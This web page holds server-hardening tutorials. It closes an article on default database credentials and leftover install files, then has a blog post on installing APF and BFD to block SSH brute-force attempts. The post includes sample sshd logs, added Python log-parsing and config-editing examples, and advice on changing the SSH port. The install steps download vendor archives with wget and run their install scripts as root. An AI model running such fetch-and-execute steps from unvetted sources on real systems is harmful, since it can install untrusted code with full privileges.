When MySQL is installed, it uses a default username of “root” and a blank password. SQL Server uses “sa” as the default user with a blank password. If someone finds the address of your database server and wants to try to log in, these are the first combinations they will try. If you have not changed the password (and ideally the username as well) from the default, then you may well wake up one morning to find your database wiped and all your customers’ credit card numbers stolen. The same applies to all software you use: if it ships with a default username or password, change them before it goes online.
Leaving Installation Files Online
Many PHP programs come with installation files. A number of these are self-deleting once run, and many applications will refuse to run until you delete the installation files. All too often, though, the install files are left online. If they are still there, they may still be usable, and someone may be able to use them to reconfigure or overwrite your entire site.
_______________________________________________________________
Original article by Dave Child. Released under a Creative Commons License.
Protect yourself from brute-forcers
Posted: August 17, 2006 at 6:56 pm |
(4) Comments
Today, I received an email from my server notifying me that someone was actually trying to brute-force into the server, so I thought I’d make a tutorial on how to protect yourself or your server.
First, you’ll need APF (Advanced Policy Firewall) installed. I’m not going to go into detail on how to set up the firewall, but you’ll need it installed so that BFD (Brute Force Detection) has something to hand the attacker’s IP to for blocking.
Installing APF
cd ~
wget http://www.rfxnetworks.com/downloads/apf-current.tar.gz
tar -xvzf apf-current.tar.gz
rm -f apf-current.tar.gz
cd apf-*
sudo sh install.sh
Installing BFD
cd ~
wget http://www.rfxnetworks.com/downloads/bfd-current.tar.gz
tar -xvzf bfd-current.tar.gz
rm -f bfd-current.tar.gz
cd bfd-*
sudo sh install.sh
Configuring BFD
Use your favorite text editor (I prefer nano) to edit the configuration file, /usr/local/bfd/conf.bfd
Find
ALERT_USR="0"
and replace it with
ALERT_USR="1"
Find
EMAIL_USR="root"
and replace it with
EMAIL_USR="your.email@webserver.com"
Save your modifications and exit your editor, then start BFD with:
/usr/local/sbin/bfd -s
Now, whenever BFD detects a brute-force attempt, it will email you at the address set above and run /etc/apf/apf -d the.attackers.ip, which tells APF to deny that IP.
The emails you receive usually look like this:
Jul 29 08:22:40 yourhostname sshd[21642]: Invalid user manfred from the.attackers.ip
Jul 29 08:22:40 yourhostname sshd[21643]: Invalid user michi from the.attackers.ip
Jul 29 08:22:42 yourhostname sshd[21642]: Failed password for invalid user manfred from the.attackers.ip port 48215 ssh2
Jul 29 08:22:42 yourhostname sshd[21643]: Failed password for invalid user michi from the.attackers.ip port 48223 ssh2
Jul 29 08:22:44 yourhostname sshd[21646]: Invalid user michi from the.attackers.ip
Jul 29 08:22:47 yourhostname sshd[21646]: Failed password for invalid user michi from the.attackers.ip port 48322 ssh2
Jul 29 08:22:47 yourhostname sshd[21647]: Failed password for postgres from the.attackers.ip port 48329 ssh2
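An added example, not part of this post or of BFD itself, of the detection step BFD performs: a Python script that runs over the log lines above (plus two constructed lines for a second, legitimate address) and counts failed password attempts per source. The threshold of three failures and the second address are assumptions; the deny command it renders is the one the post says BFD runs, returned as a string rather than executed.

```python
import re
from collections import defaultdict

# Constructed sample: the sshd lines quoted in the post, with the attacker's
# address left as the placeholder the post uses, plus two lines for a second
# address (192.0.2.7, a documentation range) that fails once and then succeeds.
SAMPLE_LOG = """\
Jul 29 08:22:40 yourhostname sshd[21642]: Invalid user manfred from the.attackers.ip
Jul 29 08:22:40 yourhostname sshd[21643]: Invalid user michi from the.attackers.ip
Jul 29 08:22:42 yourhostname sshd[21642]: Failed password for invalid user manfred from the.attackers.ip port 48215 ssh2
Jul 29 08:22:42 yourhostname sshd[21643]: Failed password for invalid user michi from the.attackers.ip port 48223 ssh2
Jul 29 08:22:44 yourhostname sshd[21646]: Invalid user michi from the.attackers.ip
Jul 29 08:22:47 yourhostname sshd[21646]: Failed password for invalid user michi from the.attackers.ip port 48322 ssh2
Jul 29 08:22:47 yourhostname sshd[21647]: Failed password for postgres from the.attackers.ip port 48329 ssh2
Jul 29 08:23:01 yourhostname sshd[21650]: Failed password for alice from 192.0.2.7 port 51002 ssh2
Jul 29 08:23:05 yourhostname sshd[21650]: Accepted password for alice from 192.0.2.7 port 51002 ssh2
"""

# Matches both "Failed password for invalid user NAME from ADDR port N ssh2"
# and "Failed password for NAME from ADDR port N ssh2" (an existing account).
FAILED_RE = re.compile(
    r"sshd\[\d+\]: Failed password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<src>\S+) port \d+"
)


def failed_logins(log_text):
    """(source address, attempted user) for each failed password line."""
    hits = []
    for line in log_text.splitlines():
        m = FAILED_RE.search(line)
        if m:
            hits.append((m.group("src"), m.group("user")))
    return hits


def offenders(log_text, threshold=3):
    """Sources with at least `threshold` failures, with the names they tried.
    `threshold` is a hypothetical value; BFD's own setting lives in conf.bfd."""
    by_src = defaultdict(list)
    for src, user in failed_logins(log_text):
        by_src[src].append(user)
    return {src: {"failures": len(users), "users": sorted(set(users))}
            for src, users in by_src.items() if len(users) >= threshold}


def block_commands(log_text, threshold=3):
    """The deny command the post says BFD hands to APF, one per offender.
    Returned as strings; nothing is executed here."""
    return [f"/etc/apf/apf -d {src}" for src in sorted(offenders(log_text, threshold))]


if __name__ == "__main__":
    for src, info in offenders(SAMPLE_LOG).items():
        print(f"{src}: {info['failures']} failures, users tried: {', '.join(info['users'])}")
    for cmd in block_commands(SAMPLE_LOG):
        print(cmd)
```

Counting only “Failed password” lines, rather than the “Invalid user” lines as well, avoids charging each attempt twice; the one legitimate typo from 192.0.2.7 stays under the threshold while the.attackers.ip, with four failures across three account names, is the only address that gets a deny command.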
Oh, and one thing I did after I received the attack: I immediately changed the default SSH port. Use your favorite text editor (nano again!) to edit /etc/ssh/sshd_config
Find
#Port 22
Uncomment the line (remove the #) and replace 22 with the port you want SSH to use. Valid port numbers go up to 65535, but 49152-65535 is the dynamic/ephemeral range the system hands out to outgoing connections, so stay at or below 49151 to avoid a collision. Before restarting, run sshd -t to check the edited file for syntax errors, and keep your current session open until you have confirmed you can connect on the new port. Then restart SSH: on CentOS it is usually service sshd restart, and on other systems /etc/rc.d/init.d/sshd restart.
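The conf.bfd edits above and this sshd_config edit are the same operation: set a directive, uncommenting it if needed. Here is an added Python example (not from the post, and not BFD’s or OpenSSH’s code) that does both on constructed excerpts of the two files and refuses a port outside the range the post warns about; the sample texts and the example address are assumptions.

```python
import re

# Constructed excerpts of the two files the post edits; not the real defaults.
SAMPLE_CONF_BFD = 'ALERT_USR="0"\nEMAIL_USR="root"\n'
SAMPLE_SSHD_CONFIG = "# sshd_config (constructed excerpt)\n#Port 22\nProtocol 2\n"


def set_directive(text, key, value, sep=" "):
    """Return `text` with the first line for `key` set to `key<sep>value`.

    Handles an active line (EMAIL_USR="root"), a commented-out one (#Port 22,
    which is uncommented in the process) and a missing one (appended). Only the
    first match is changed; a later duplicate is left in place so it shows up
    in review rather than being silently edited.
    """
    line_re = re.compile(r"^\s*#?\s*" + re.escape(key) + r"(?=\s|=)")
    new_line = f"{key}{sep}{value}"
    lines = text.splitlines()
    for i, line in enumerate(lines):
        if line_re.match(line):
            lines[i] = new_line
            break
    else:
        lines.append(new_line)
    return "\n".join(lines) + "\n"


def port_is_usable(port):
    """1-65535 is valid; the post's rule of staying below 49152 keeps clear of the
    dynamic/ephemeral range that outgoing connections are assigned from."""
    return 1 <= port <= 65535 and port < 49152


def set_ssh_port(sshd_config_text, port):
    """The sshd_config change from the post, with the port range enforced."""
    if not port_is_usable(port):
        raise ValueError(f"port {port} is outside 1-49151")
    return set_directive(sshd_config_text, "Port", str(port))


def configure_bfd(conf_text, email):
    """The two conf.bfd changes from the post: turn alerts on, set the address."""
    conf_text = set_directive(conf_text, "ALERT_USR", '"1"', sep="=")
    return set_directive(conf_text, "EMAIL_USR", f'"{email}"', sep="=")


if __name__ == "__main__":
    print(configure_bfd(SAMPLE_CONF_BFD, "your.email@webserver.com"))
    print(set_ssh_port(SAMPLE_SSHD_CONFIG, 2222))
```

The functions return the new file text rather than writing it, so the result can be diffed and checked with sshd -t before it replaces the live sshd_config.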
After getting attacked, I did a WHOIS on the IP (run whois the.attackers.ip). You’ll usually see an abuse contact such as abuse@somedomain.com among the addresses listed.
Make sure to send them an email including the log lines from BFD’s message, your server’s IP and the attacker’s IP.
Thanks a lot for reading